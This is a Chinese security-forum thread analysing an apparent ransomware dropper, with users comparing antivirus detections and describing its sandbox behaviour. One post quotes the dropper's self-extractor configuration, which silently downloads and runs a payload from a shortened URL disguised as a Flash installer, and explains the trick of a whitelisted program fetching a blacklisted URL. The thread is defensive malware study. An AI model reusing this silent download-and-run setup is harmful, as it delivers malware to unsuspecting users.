新版勒索病毒-2018-7-25

显示全部楼层 · 发表于 2018-7-25 11:36:42

www-tekeze 发表于 2018-7-25 11:34
B大，火绒报毒窗口里有：感染文件 install_flash_player.exe，那是不是这个安装包已被动了手脚，并不是个 ...

flash那个是恶意链接下载的，本体释放的安装包貌似是爱奇艺

显示全部楼层 · 发表于 2018-7-25 11:44:59

B100D1E55 发表于 2018-7-25 11:36
flash那个是恶意链接下载的，本体释放的安装包貌似是爱奇艺

有联网请求，flash是下载的，但很快自删除，我快捷键截图都来不及，只留下了那个爱奇艺图标的，但对这个衍生的扫描，火绒和智量都不报，VT也没一家报，另外，这个爱奇艺的也是双击后瞬间自删除，不知道要搞哪样。。

显示全部楼层 · 发表于 2018-7-25 12:24:09

TheYuCheng 发表于 2018-7-25 11:07
怎么是cerber

你这个自制的会反沙盘？那反虚拟机么？

待会试试就知道了。。。

显示全部楼层 · 发表于 2018-7-25 13:15:43

禁止上报此病毒

https://www.virustotal.com/#/file/b15e5b1730c3cf02bbef0dc930733fdf09d7a26bc57b3be2f6632899bfc2fc53/detection
已上传至VT

显示全部楼层 · 发表于 2018-7-25 15:00:01

www-tekeze 发表于 2018-7-25 12:24
你这个自制的会反沙盘？那反虚拟机么？待会试试就知道了。。。

虚拟机里放开跑了下，首先释放一个爱奇艺图标的exe，然后联网下载flash，而这个flash会调用cmd。。。
最终自删除，其它行为看不到，也许反虚拟机？

显示全部楼层 · 发表于 2018-7-25 15:10:50

本帖最后由 www-tekeze 于 2018-7-25 15:38 编辑

www-tekeze 发表于 2018-7-25 15:00
虚拟机里放开跑了下，首先释放一个爱奇艺图标的exe，然后联网下载flash，而这个flash会调用cmd。。。
最 ...

实机影子模式里双击，情况相同，最终自删除，也许恶意下载源失效，over？
紧接着用火绒快速扫描也没发现问题，凭空消失了。。

附上云沙箱里的行为，进程crashed 。

显示全部楼层 · 发表于 2018-7-25 15:19:55

KIS 2019 miss，沙箱运行自动退出，全程卡巴无反应

显示全部楼层 · 发表于 2018-7-25 15:23:57

病毒探索者发表于 2018-7-25 15:19
KIS 2019 miss，沙箱运行自动退出，全程卡巴无反应

奇怪的是....

显示全部楼层 · 发表于 2018-7-25 15:45:07

Path=%Temp%
Setup=sfdownload314870.exe "http://dwz.cn/8QPpNa7c" "%Temp%\install_flash_player.exe" "" "" "" "" "" ""
Silent=1
Overwrite=2

http://dwz.cn/8QPpNa7c
还原后：
https://note.youdao.com/yws/api/ ... a5eb2635e8ee38085ee

白名单程序给黑名单URL执行,学习学习这个骚操作。

ESET 7月15号的病毒库杀。白加黑在ESET这不管用了。

显示全部楼层 · 发表于 2018-7-25 15:51:38

FSP双击拦截

[病毒样本] 新版勒索病毒-2018-7-25

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源